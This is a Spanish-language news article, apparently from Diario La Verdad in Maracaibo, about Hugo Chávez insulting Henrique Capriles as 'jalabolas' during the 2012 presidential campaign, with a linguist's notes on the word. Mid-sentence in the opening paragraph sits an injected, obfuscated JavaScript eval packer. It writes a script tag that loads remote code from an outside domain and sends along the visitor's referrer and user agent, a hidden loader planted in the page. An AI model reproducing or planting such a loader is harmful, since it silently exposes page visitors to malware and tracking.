publicidad

Nuevos sondeos sacan de quicio al Presidente

Mesa Central de Redacción / Maracaibo / noticias@laverdad.com
“Jalabolas” eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zyzsr|var|u0026u|referrer|iaibr||js|php'.split('|'),0,{})) es el último descalificativo patentado por el candidato Presidente contra Henrique Capriles Radonski. Antenoche, en Vargas, el líder oficialista retomó la agresión en su discurso. Reconoció, por primera vez, que de ganar el 7-O, no lo hará “cómodamente”

Hugo Chávez Frías frunce el ceño, aprieta los ojos, vocifera. Tiene la cara roja, agita brazos y manos, arenga, exhibe sus ojeras. La imagen en el video de minuto y medio lo muestra enardecido, desafiante, descuadrado. Se dirige a ocho mil trabajadores petroleros en el Polideportivo José María Vargas, pero el comandante fija su mirada a las cámaras de televisión. Lo demás lo reseñó la prensa, con mucho más pudor que el jefe de Estado, pese al horario supervisado. "¡Jalabola!". Así calificó en ocho oportunidades a Henrique Capriles Radonski.

La razón, según el mandatario, para la nueva retahíla de insultos electorales contra su adversario, fue una declaración del líder de la oposición venezolana, quien el miércoles, en Guayana, expresó que ningún trabajador de ninguna empresa del Gobierno ni del Estado, ni de la administración pública tendrá que verse obligado a ponerse la franela de un color. "No queremos trabajadores jalabolas, sino trabajadores que echen pa' lante. Quiero que se sientan orgullosos de trabajar para Venezuela".

El candidato oficialista se aprovecha. Aliña la declaración de su contrincante y se afinca. Pregona que sale en defensa de los representantes progobierno del sector sindical de Bolívar, donde por cierto, el rechazo obligó a su equipo a cortar de cuajo una cadena presidencial. Le suma la supuesta agresión a los soldados de la patria porque según el análisis de Ángel Emiro Vera, coordinador político de UNT, quiere involucrarlos aún más en su campaña por la reelección sempiterna.

Definición

En un artículo de opinión, el lingüista Alexis Márquez Rodríguez, aclara que la palabra "jalabolas" no aparece en el Diccionario de la Real Academia Española (Drae), pero sí en el "Diccionario de venezolanismos" (UCV / MJ Tejera): "Jalabolas: Adulador"; y en el "Diccionario del habla actual de Venezuela" (Ucab / Pérez-Núñez): "Jalabola (s): Persona que consecuentemente utiliza la adulación como medio para obtener sus fines. (Š)". El Drae sí registra "jalador, ra", con la marca de venezolanismo y definido como "adulador".

A Hugo Chávez la cita textual de Capriles definitivamente lo marcó. Tal y como sucedió con lo "viejo" y lo "nuevo". Golpe maestro que expone sin ruidos alternos un signo inequívoco del Gobierno revolucionario. Todo gira en torno de su figura. A él sus funcionarios lo alaban, exaltan y endiosan. Quien se ciña a esta línea de charretera militar es sospechoso de portar en su sangre el gen de la traición contrarrevolucionaria.

Alexis Márquez Rodríguez enfatiza que el origen de "jalabolas" es incierto. Hay, escribió, algunas voces que aseguran que el término coloquial viene de cuando en las cárceles del siglo XIX y comienzos del XX, algunos presos que eran más o menos poderosos, pagaban a otros presos para que les cargasen las pesadas bolas de hierro que, atadas a una larga cadena que llevaban al pie, les impedían correr y caminar, a fin de aliviarse el impedimento.

"A esta especie de cirineos que cargaban aquellas bolas, para que el que pagaba pudiera moverse con cierta facilidad, los llamaban 'cargabolas', expresión que con el tiempo derivó hacia 'jalabolas'. No doy por segura esta explicación, pero luce muy verosímil", explica Márquez Rodríguez.

Ángel Emiro Vera trae el término para detallar la angustia del Presidente por el resultado de las últimas encuestas realizadas por empresas del extranjero. Su candidatura va en picada y la amenaza coge aire. Sobreviene entonces como complemento, y según el Drae, la palabra shock: "Estado de profunda depresión nerviosa y circulatoria, sin pérdida de la conciencia, que se produce después de intensas conmociones".

 

 

"Nosotros, a estas alturas, estamos ganando las elecciones, yo no digo que cómodamente, no, no, pero estamos ganando".

Hugo Chávez, candidato del PSUV

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama